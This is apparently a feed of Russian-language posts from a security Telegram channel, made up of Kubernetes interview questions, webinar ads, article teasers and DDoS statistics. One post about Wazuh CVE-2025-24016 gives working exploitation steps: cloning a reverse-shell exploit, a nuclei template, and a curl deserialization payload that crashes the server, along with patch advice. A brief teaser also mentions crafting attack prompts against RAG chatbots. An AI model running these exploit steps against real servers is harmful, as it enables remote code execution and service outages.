Топ вопросов и ответов на собеседовании по Kubernetes #k8s #собес #собеседование #kubernetes Не то чтобы мне интересно были собеседования, но т.к. самому приходиться изучать кубер, то вопросами с собеса понимаешь что есть минимальная граница знаний, чтобы можно было сказать "я знаю, что такое кубер" Статья базовая, но подойдёт начинающим DevOps, AppSec, DevSecOps, CloudSec спецам или тем, кто хочет мигрировать в ранее перечисленные должности. Вопросы на собесе: ➡️Что такое Kubernetes? ➡️Перечислите основные компоненты кластера Kubernetes ➡️Что такое Pod в Kubernetes? ➡️В чем разница между Deployment и StatefulSet? ➡️Что такое сервис (service) и какие типы сервисов существуют в Kubernetes? ➡️Что такое Ingress? ➡️Что такое Ingress-контроллер? ➡️Как организовать хранение чувствительных данных (секретов), включая логины, пароли, токены, ключи? ➡️Что такое метки и селекторы и для чего они используются? ➡️Что такое пробы (probes) в Kubernetes, какие типы проб существуют и для чего используются? ➡️Что такое Pod Disruption Budget и для чего используется? ➡️Как контролировать использование ресурсов для контейнеров? ➡️Как предоставить доступ до запущенного приложения из внешней сети? ➡️Что такое CNI-интерфейс? ➡️Что такое CRI? ➡️Что такое Persistent Volume (PV)? ➡️Что такое Persistent Volume Claim (PVC)? ➡️Как назначать права доступа в кластере Kubernetes? А ответы на эти вопросы вы прочитаете в статье на Хабре)) ➡️ Узнать ответы P.S. если ответить самому себе честно, на сколько вопросов из 18 вы смогли ответить? 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Похек
5
подписчиков
Систематизируйте хаос в ИБ. На канале собрана информация для качественного изучения мира кибербезопасности, участия в CTF и старта в bugbounty.
В условиях роста количества и усложнения кибератак отсутствие автоматизированных подходов к реагированию на инциденты ИБ увеличивает риски для бизнеса. Только 36% компаний выявляют нарушителей в большинстве случаев, а почти четверть уже сталкивались с критичными кибератаками. К2 Кибербезопасность и Kaspersky провели более 100 глубинных интервью в Enterprise-сегменте и выяснили, как бизнес подходит к построению процессов мониторинга и реагирования. 20 февраля в 11:00 мск в формате живого диалога обсудим результаты исследования и поделимся экспертным прогнозом о развитии рынка SOC. В программе встречи: ✅ Как SOC ускоряет обнаружение и устранение инцидентов ✅ В чем преимущества MSSP-модели по сравнению с другими моделями ✅ О чем надо помнить при построении собственного SOC ✅ На что нужно обращать внимание при выборе провайдера услуг. Кстати, все зарегистрированные участники в числе первых получат полный текст исследования до митапа. Зарегистрироваться на онлайн-митап можно по ссылке 😉 Реклама. АО "К2 ИНТЕГРАЦИЯ". ИНН 7701829110
Wazuh RCE via Unsafe Deserialization CVE-2025-24016 #CVE@poxek #wazuh #deserialization #RCE В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров DistributedAPI в формате JSON и последующей десериализации через функцию as_wazuh_object (расположенную в framework/wazuh/core/cluster/common.py). Если злоумышленник внедрит небезопасный словарь в запрос или ответ DAPI, это может привести к генерации необработанного исключения (__unhandled_exc__) и, как следствие, выполнению произвольного Python-кода, что позволяет дистанционно выполнить код на сервере. ➡️Уязвимые версии От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1) PoC 1. Эксплойт на python3 git clone https://github.com/0xjessie21/CVE-2025-24016.git cd CVE-2025-24016/ python3 -m venv venv; source venv/bin/activate pip install -r requirements.txt Скрипт позволяет сразу сделать reverse shell python3 CVE-2025-24016.py -u <url> -i <IP> -p <PORT> PoC 2. Шаблон для nuclei wget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yaml Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку PoC 3. Ручная эксплуатация curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"unhandled_exc":{"class": "exit", "args": []}}' https://<worker-server>:55000/security/user/authenticate/run_as Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера. 📌Пояснение к уязвимости от разработчиков Wazuh ТЫК ➡️Рекомендации ▪️Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена. ▪️Ограничение доступа: Проверьте и ограничьте доступ к API. 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Ломаем ваши видеокарты: распаковка эксплойта для CVE-2024-0132 под NVIDIA Container Toolkit #nvidia #CVE@poxek #container В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit. Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости. P.s. респект команде Luntry ➡️Подробности 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Крутая возможность для: • специалистов по реагированию на компьютерные инциденты • сотрудников команд SOC, TI, DFIR ⚡️Авторский курс по анализу вредоносного ПО На курсе ты освоишь инструменты и техники, необходимые для анализа вредоносных программ под Windows. Ты научишься: 📎 проводить предварительный анализ образцов через открытые сервисы и источники, а также в песочницах; 📎 работать с дизассемблированным кодом в рамках статического анализа; 📎 использовать отладчик для динамического анализа исполняемых файлов; 📎 обходить техники, затрудняющие анализ вредоносного кода; 📎 писать YARA-правила. Авторы курса: 1. Дмитрий Купин — Руководитель группы исследования вредоносного кода (BI. ZONE) 2. Семён Рогачев — Руководитель отдела реагирования на инциденты в компании Бастион ✅ Учим тому, что точно пригодится в работе ✅ Комфортная нагрузка без отрыва от работы ✅ Вечный доступ в чат с экспертами и коллегами Старт: 1 марта → Смотри программу и записывайся
Обычная практика Threat Hunting и причем тут пирамида боли #TI #threatintelligence #threathunting Привет Хабр! Меня зовут Иван Костыря, и я работаю в команде VK SOC, а точнее — в группе реагирования, куда стекаются все подозрения на инциденты информационной безопасности в компании. Сегодня хочу рассказать немного о том, как мы ищем угрозы в периметре компании, какие средства и техники для этого используем. Если коротко, то этот процесс можно описать так — мы задаем себе очень много вопросов и постоянно ищем на них ответы. Статья будет интересна начинающим специалистам: здесь я обобщил основные практики и рекомендации, которые выработаны в индустрии и проверены опытом нашей команды. P.S. мы уже с одним из админом начали готовить для вас материал по TI, всё по просьбе подписчиков) Stay tuned 🍞 ➡️Читать далее 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Эксперты CURATOR (до ноября 2024 — Qrator Labs) выпустили годовой отчет “DDoS-атаки, боты и BGP-инциденты в 2024 году: статистика и тренды”, в котором собрали самые важные факты об угрозах прошедшего года. Внутри много интересного, вот основные цифры: 📈 Рост DDoS-атак • Общее число DDoS-атак выросло на 53% по сравнению с 2023 годом • Рекордная атака достигла 1,14 Тбит/с, на 65% больше прошлогоднего рекорда • Самая длительная атака продолжалась 19 дней (в 2023 году — 3 дня) • Крупнейший ботнет года — 227 тыс. устройств (в 2023 году — 136 тыс.) 🏦 Кого атаковали чаще всего • Наибольшее число L3-L4 атак: Финтех (25,8%), Электронная коммерция (20,5%) и Медиа (13,5%) • 52% всех L7 атак пришлось на Финтех, на втором и третьем местах — Электронная коммерция (18%) и ИТ и Телеком (9,6%) 🤖 Боты • Среднемесячная активность ботов выросла на 30% • Чаще всего атаковали Онлайн-ритейл — 36,2% от всей бот-активности 🌍 Страны-источники DDoS-атак 1. Россия — 32,4% 2. США — 20,6% 3. Бразилия — 5,8% (Китай выпал из топ-3) 🌐 BGP-инциденты • Рост BGP route leaks — на 10%, BGP hijacks — на 24% • Глобальные инциденты: +59% route leaks • Один из успехов: предотвращение глобальной утечки маршрутов с использованием стандарта RFC 9234, разработанного экспертами CURATOR вместе с IETF Вы можете скачать полный отчет, чтобы узнать все подробности. А еще недавно ребята создали Telegram-канал CURATOR, чтобы делиться своей экспертизой. Можете подписаться на них и следить за обновлениями.
Как сделать чат-бот с RAG безопаснее? #AI #RAG #нейросеть #MLSecOps Каждый день появляются решения на базе генеративных моделей, помогающие бизнесу привлекать новых пользователей и удерживать старых. Подход Retrieval augmented generation позволяет вводить в контекст больших языковых моделей (LLM) корпоративные документы, чтобы чат-бот корректнее отвечал на вопросы пользователей. Гарантирует ли добавление документа в контекст, что чат-бот не будет вводить пользователей в заблуждение или отвечать на вопросы про изготовление бомб? В качестве языковой модели для генерации ответов продолжим использовать open-mixtral-8x22b, а для улучшения атакующих промптов — mistral-large-2411. ➡️Читать далее 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Enhancements for BloodHound v7.0 Provide Fresh User Experience and Attack Path Risk Optimizations #AD #bloodhound #activedirectory Команда BloodHound представила в последних обновлениях несколько концепций, которые упростили пользователям визуализацию путей атаки и позволили отслеживать снижение рисков, связанных с идентификацией, в динамике. На этой неделе выходит BloodHound v7.0, который включает значительные улучшения, направленные на повышение удобства работы пользователей и более точную оценку рисков в цепочках атак. ➡️Release Note ➡️Читать далее 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Безопасная контейнеризация: вызовы и решения Сегодня контейнерная разработка и эксплуатация приложений в России невозможны без отечественных операционных систем и платформ оркестрации. В новых условиях возрастает потребность в эффективной защите контейнерных сред с учетом российской спецификации. 18 февраля в 11:00 «Лаборатория Касперского» проведёт стрим, посвящённый безопасности контейнерных технологий. Эксперты обсудят текущий технологический и угрозный ландшафт, разберут актуальные методы защиты процессов разработки и эксплуатации, а также представят ключевые обновления решения Kaspersky Container Security 2.0. Регистрация по ссылке.
Ревизор приехал: pg_anon проверяет, всё ли скрыто #psql #Postgresql #pg #dev В современном мире, где данные становятся новой нефтью, разработчики часто сталкиваются с дилеммой: как тестировать приложения на реальных данных, не подвергая риску конфиденциальную информацию пользователей? Использование продакшн-данных в тестовых средах без должной анонимизации может привести к серьёзным утечкам и, как следствие, к многомиллионным штрафам и потере репутации компании. Здесь на помощь приходит инструмент pg_anon — решение для анонимизации данных в PostgreSQL. С его помощью можно маскировать персональные данные, сохраняя при этом структуру и целостность информации. Это особенно важно для разработчиков и тестировщиков, которым нужны реалистичные данные для работы без риска нарушения конфиденциальности. В статье подробно рассматриваются примеры конфигураций pg_anon и приводится пошаговое руководство по его внедрению в процессы разработки. Автор, опираясь на 15-летний опыт работы с данными в крупных проектах, подчёркивает, что безопасность данных — это не препятствие для работы, а залог спокойствия и стабильности бизнеса. Для разработчиков, стремящихся обеспечить безопасность данных и соответствие современным стандартам защиты информации, внедрение таких инструментов, как pg_anon, становится не просто рекомендацией, а необходимостью. ➡️Читать далее 🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
🔐По статистике компании CURATOR, количество DDoS-атак в 2024 году выросло на 53% по сравнению с 2023-м. Их продолжительность тоже растёт — самая долгая атака 2024-го длилась больше 19 дней. Сейчас подходящее время подумать о стратегии защиты в 2025-м. 🔴На вебинаре MTC Web Services эксперты MWS и CURATOR разберут самые массовые сценарии атак и дадут рекомендации, как защитить свою инфраструктуру. Вы узнаете: — Ключевые тренды и тактики DDoS-атак в 2024 году — Реальные примеры, как кибератаки влияют на бизнес — Сценарии потенциальных угроз, которые будут актуальны в 2025-м — Рекомендации, как подготовить инфраструктуру к новым волнам DDoS-атак ➡️Регистрируйтесь на вебинар, задавайте свои вопросы и пишите комментарии в чате трансляции: за лучший вопрос будет подарок от команды!